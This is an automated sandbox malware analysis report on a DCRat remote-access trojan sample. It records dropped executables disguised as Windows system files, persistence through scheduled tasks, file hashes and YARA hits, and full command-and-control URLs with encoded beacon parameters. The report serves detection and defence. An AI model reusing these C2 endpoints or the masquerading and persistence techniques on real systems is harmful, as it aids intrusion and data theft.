                            C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe79%ReversingLabsByteCode-MSIL.Trojan.Mardom
                            C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe79%ReversingLabsByteCode-MSIL.Trojan.Mardom
                            C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe79%ReversingLabsByteCode-MSIL.Trojan.Mardom
                            C:\Users\Default\RuntimeBroker.exe79%ReversingLabsByteCode-MSIL.Trojan.Mardom
                            C:\Users\Public\Libraries\RuntimeBroker.exe79%ReversingLabsByteCode-MSIL.Trojan.Mardom
                            C:\Windows\Help\OEM\ContentStore\jnTUlYyDyuybgXdgxhTkT.exe79%ReversingLabsByteCode-MSIL.Trojan.Mardom
                            C:\Windows\Media\WinStore.App.exe79%ReversingLabsByteCode-MSIL.Trojan.Mardom
                            C:\Windows\Migration\WTR\jnTUlYyDyuybgXdgxhTkT.exe79%ReversingLabsByteCode-MSIL.Trojan.Mardom
                            C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe79%ReversingLabsByteCode-MSIL.Trojan.Mardom

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                            http://mioww.uH0%Avira URL Cloudsafe
                            http://mioww.uHrF0%Avira URL Cloudsafe
                            http://mioww.uebki.one/L1nc0In.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB100%Avira URL Cloudmalware
                            http://mioww.uebki.one/L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZ100%Avira URL Cloudmalware
                            http://mioww.uebki.one/0%Avira URL Cloudsafe
                            http://mioww.uebki.oneesda0%Avira URL Cloudsafe
                            http://mioww.uebki.one/L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVIp0QMl2aslkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWUq50ZVJzYwpESjlnVHRWdWVUS3VERJpHZzI2a1cVYYpUaPlWSYp1V1cVYYp0QMljS5FWe5c1VmRGWa9UOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETpdmaOdXQqxEMjRFTz1kaNh3Yqx0dRpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5FWe5c1VnNGWa9kSp9Ua0IjYwR2ValnSDxUaz12Y2xmRJNjVtRVavpWS1IFWhpmSDxUaNpXT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETp1keNFTWq1UeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI4MjZkJzNyIGNmBTYiNjNjRDZ3cjYkFGN3QTYllTYzUWOiFDZhF2YjJiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W100%Avira URL Cloudmalware
                            http://mioww.uebki.one/L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY100%Avira URL Cloudmalware
                            http://mioww.uebki.one/L1nc0In.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&79bfb28a16afb84a575d312c4453c517=f06eb19c95e712422ee4c585262cca64&5690ae1271d74814e0008b34a8c960fd=gY5QWY2UGO4EzYkRDO3MWO5YzYmRmY4YmYiJGO3cjZwMWY2I2YkJTY&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT100%Avira URL Cloudmalware
                            http://mioww.uebki.one/@==gbJBzYuFDT0%Avira URL Cloudsafe
                            http://mioww.uebki.one0%Avira URL Cloudsafe

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            mioww.uebki.one
                            		188.114.97.3
                            		truetrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://mioww.uebki.one/L1nc0In.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&79bfb28a16afb84a575d312c4453c517=f06eb19c95e712422ee4c585262cca64&5690ae1271d74814e0008b34a8c960fd=gY5QWY2UGO4EzYkRDO3MWO5YzYmRmY4YmYiJGO3cjZwMWY2I2YkJTY&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGTtrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://mioww.uebki.one/@==gbJBzYuFDTtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://mioww.uebki.one/L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVIp0QMl2aslkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWUq50ZVJzYwpESjlnVHRWdWVUS3VERJpHZzI2a1cVYYpUaPlWSYp1V1cVYYp0QMljS5FWe5c1VmRGWa9UOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETpdmaOdXQqxEMjRFTz1kaNh3Yqx0dRpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5FWe5c1VnNGWa9kSp9Ua0IjYwR2ValnSDxUaz12Y2xmRJNjVtRVavpWS1IFWhpmSDxUaNpXT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETp1keNFTWq1UeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI4MjZkJzNyIGNmBTYiNjNjRDZ3cjYkFGN3QTYllTYzUWOiFDZhF2YjJiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3Wtrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://mioww.uebki.one/L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTYtrue
                              • Avira URL Cloud: malware
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://mioww.uHjnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000003032000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002D61000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://mioww.uHrFjnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002EF5000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://mioww.uebki.one/L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZjnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002991000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002E25000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002B3B000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002A99000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002C4F000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002BD9000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002C84000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002F93000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000003032000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002E56000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002D24000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002B06000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              http://mioww.uebki.oneesdajnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002991000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namedmhu7oz5yP.exe, 00000000.00000002.1672344237.0000000002794000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002991000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://mioww.uebki.one/jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002991000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://mioww.uebki.one/L1nc0In.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktBjnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002991000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              http://mioww.uebki.onejnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002E56000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002D24000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002CEF000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002F5F000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002D96000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002A60000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              188.114.97.3
                              		mioww.uebki.oneEuropean Union
                              		13335CLOUDFLARENETUStrue

                              General Information

                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1502160
                              Start date and time:2024-08-31 10:11:04 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 8m 58s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:42
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:dmhu7oz5yP.exe
                              renamed because original name is a hash value
                              Original Sample Name:ED9312F79BD3E7F4BEB41E56EA82512E.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@45/35@1/1
                              EGA Information:
                              • Successful, ratio: 22.2%
                              HCA Information:
                              • Successful, ratio: 91%
                              • Number of executed functions: 265
                              • Number of non-executed functions: 14
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                              Warnings

                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target RuntimeBroker.exe, PID 7688 because it is empty
                              • Execution Graph export aborted for target RuntimeBroker.exe, PID 7720 because it is empty
                              • Execution Graph export aborted for target fontdrvhost.exe, PID 7584 because it is empty
                              • Execution Graph export aborted for target fontdrvhost.exe, PID 7604 because it is empty
                              • Execution Graph export aborted for target jnTUlYyDyuybgXdgxhTkT.exe, PID 7664 because it is empty
                              • Execution Graph export aborted for target upfc.exe, PID 3524 because it is empty
                              • Execution Graph export aborted for target upfc.exe, PID 5600 because it is empty
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              04:11:56API Interceptor14493216x Sleep call for process: jnTUlYyDyuybgXdgxhTkT.exe modified
                              09:11:45Task SchedulerRun new task: {C5E65FB5-D034-42FB-A6A3-B8591837A42A} path:
                              09:11:53Task SchedulerRun new task: fontdrvhost path: "C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe"
                              09:11:53Task SchedulerRun new task: fontdrvhostf path: "C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe"
                              09:11:53Task SchedulerRun new task: jnTUlYyDyuybgXdgxhTkT path: "C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe"
                              09:11:53Task SchedulerRun new task: jnTUlYyDyuybgXdgxhTkTj path: "C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe"
                              09:11:53Task SchedulerRun new task: RuntimeBroker path: "C:\Users\Public\Libraries\RuntimeBroker.exe"
                              09:11:53Task SchedulerRun new task: RuntimeBrokerR path: "C:\Users\Public\Libraries\RuntimeBroker.exe"
                              09:11:56Task SchedulerRun new task: upfc path: "C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe"
                              09:11:57Task SchedulerRun new task: upfcu path: "C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe"
                              09:11:57Task SchedulerRun new task: WinStore.App path: "C:\Windows\Media\WinStore.App.exe"
                              09:11:57Task SchedulerRun new task: WinStore.AppW path: "C:\Windows\Media\WinStore.App.exe"

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              188.114.97.3SecuriteInfo.com.Trojan.DownLoader47.19820.5694.3811.exeGet hashmaliciousUnknownBrowse
                              • rustmacro.ru/autoupdate.exe
                              QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                              • filetransfer.io/data-package/DGApDW0P/download
                              QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                              • filetransfer.io/data-package/DGApDW0P/download
                              QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • filetransfer.io/data-package/8hthkO24/download
                              gHPYUEh253.exeGet hashmaliciousDjvu, Neoreklami, Stealc, Vidar, XmrigBrowse
                              • joxi.net/4Ak49WQH0GE3Nr.mp3
                              Izvod racuna u prilogu.exeGet hashmaliciousDBatLoader, FormBookBrowse
                              • www.coinwab.com/kqqj/
                              file.exeGet hashmaliciousLummaCBrowse
                              • joxi.net/4Ak49WQH0GE3Nr.mp3
                              Document_pdf.exeGet hashmaliciousFormBookBrowse
                              • www.x0x9x8x8x7x6.shop/dscg/
                              QUOTATION_AUGQTRA071244#U00b7PDF.scrGet hashmaliciousUnknownBrowse
                              • filetransfer.io/data-package/zbi9vNYx/download
                              z1209627360293827.exeGet hashmaliciousDBatLoader, FormBookBrowse
                              • www.coinwab.com/kqqj/

                              Domains

                              No context

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              CLOUDFLARENETUSfile.exeGet hashmaliciousUnknownBrowse
                              • 172.64.41.3
                              file.exeGet hashmaliciousUnknownBrowse
                              • 172.64.41.3
                              file.exeGet hashmaliciousUnknownBrowse
                              • 172.64.41.3
                              file.exeGet hashmaliciousUnknownBrowse
                              • 172.64.41.3
                              file.exeGet hashmaliciousUnknownBrowse
                              • 172.64.41.3
                              file.exeGet hashmaliciousUnknownBrowse
                              • 172.64.41.3
                              IrisMichael263Fiona.lib.exeGet hashmaliciousLummaCBrowse
                              • 188.114.96.3
                              http://flow-energy-3109.my.salesforce.comGet hashmaliciousUnknownBrowse
                              • 104.18.32.137
                              file.exeGet hashmaliciousUnknownBrowse
                              • 172.64.41.3
                              https://found.ee/5PKNrGet hashmaliciousUnknownBrowse
                              • 104.18.11.207

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Program Files (x86)\Windows NT\Accessories\en-GB\ea1d8f6d871115

                              Download File
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with very long lines (530), with no line terminators
                              Category:dropped
                              Size (bytes):530
                              Entropy (8bit):5.884752547117182
                              Encrypted:false
                              SSDEEP:6:hVbhxDie3acJBarsvzCkDqeE0IeX+BvkCqf2xuVBFdQbzkgZMeVnU9iX6Mtxi5NT:jbhpiCBaQvll+cN5CIgSet0Mxi7tG5x+
                              MD5:2A9A38473F9EE96330BF16E1F922F721
                              SHA1:A2A62D3EB6447F4B3E93497D47AF38C234EFDBA7
                              SHA-256:2CAD5914B857CFB92C16EE01F905427C324245075B280741A57DB03557F8BC97
                              SHA-512:E25227A7E0EE5FCDE89E7011C449936FCB3740AFBE557489836422C78222B0E7067E0166DD7E63D798C9965AE7CDC39181218F95CEE31B570E565E75385D187E
                              Malicious:false
                              Preview:nUOXmhKEBIHWSn0AMDnptYUilWgWpdRvcY8kHZJVFmZvYgzxWulMn2xOApvQBxYi0W33oQ2w4RjG9jKFgs951EHjlujcn2URN04Cm6IG1yRWTqPafqtSydqwOUS4qaJB7R3IpIdkk3DCxvP4eJ77JBduJHyRnNaaoPYBxHuXNJs4Zo9cEXZgdM25xI8hTL6WdmXhWOHXYku9TjUfIWMPy37cXdNoJNDBNVbwQcF0QCI3c3mOxcZ78qijp5J3AcOLgsw7HhPqQW8vvE9d180qxFDgx2HUSL0yx6WuHoHPMsrmrwxk5qCBlhXapPKPa4YEgK7yrPWM1kdEYbyAEgZmJyMQj5E1d2zSUmFgz82qTzKBESCObKK3fw4r8rPwKft9vLuvVRLFnsSToKMQ30aTr5wirXiHtGfxGKQ2iQ3J8EPwdlDxf92TFZRzYME7tDWhMfMd4Tsn7QUmpAEGTumtNMrr2aeWM5a5rsk8Yk2LQPVyEpJYH7n8bmTAxfkezWbB0Z47ZGrt1ad703nNRF

                              C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe

                              Download File
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):323072
                              Entropy (8bit):5.759825134174161
                              Encrypted:false
                              SSDEEP:6144:P54y2oo7KrA7bRCgxHV4casxgZ0BBxxqHsyQK4M0dxVbhaLr9u:P72N7J5FHVGZ0AQZRdx8Z
                              MD5:ED9312F79BD3E7F4BEB41E56EA82512E
                              SHA1:213D531F2CA1543ECC1AF3AD2B7FE56B4B027BFE
                              SHA-256:786B9891BC5CA12D44F2DF1A978F675693647EAED50DA66B92BDBD3C290BCA88
                              SHA-512:E057055CADB37DD8EE8F4C0308B19C8B19FA6274064C54B1927EC23DD80EEC2C952E1F35F54B8E4B60B7E128B23940FF13C460EE5CF85E20EEB5AA217FDAF4E3
                              Malicious:true
                              Yara Hits:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe, Author: Joe Security
                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe, Author: Joe Security
                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe, Author: ditekSHen
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 79%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..........".................~.... ... ....@.. .......................`.......^....@.................................,...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................`.......H.......H...............................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                              C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe:Zone.Identifier

                              Download File
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Preview:[ZoneTransfer]....ZoneId=0

